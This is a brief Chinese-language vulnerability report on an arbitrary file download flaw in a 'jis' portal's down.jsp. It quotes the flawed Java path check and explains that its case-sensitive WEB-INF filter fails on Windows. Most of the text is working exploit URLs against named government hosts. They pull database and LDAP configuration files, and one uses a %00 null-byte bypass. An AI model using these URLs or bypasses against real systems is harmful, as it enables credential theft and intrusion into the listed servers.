界面:
jis任意文件下载。至少WIN下一般都可以通杀,个别版本加了权限验证需要登录,但是我觉得只要登录后的身份合适,在win下都通杀的。
if(strFilePath.indexOf("WEB-INF")!=-1){
LogWriter.debug("下载文件不存在!");
out.println("<script>alert('file not exist!');history.back();</script>");
return;
}
//判断文件是否存在
File file = new File(strFilePath);
if (!file.exists() || file.getName().endsWith(".jsp")) {
LogWriter.debug("下载文件不存在!");
out.println("<script>alert('file not exist!');history.back();</script>");
return;
}
对大小写敏感的判断在win下根本没用啊
http://management.ysx.gov.cn/jis/down.jsp?pathfile=web-inf/config/dbconfig.xml
http://ln-n-tax.gov.cn/jis/down.jsp?pathfile=WEB-INF/config/dbconfig.xml
http://jis.sdds.gov.cn/jis/down.jsp?pathfile=down.jsp%00
http://210.75.196.69/jis/down.jsp?pathfile=portlet/gmail/ldapconf.xml
http://leader.beijing.gov.cn/jis/down.jsp?pathfile=portlet/gmail/ldapconf.xml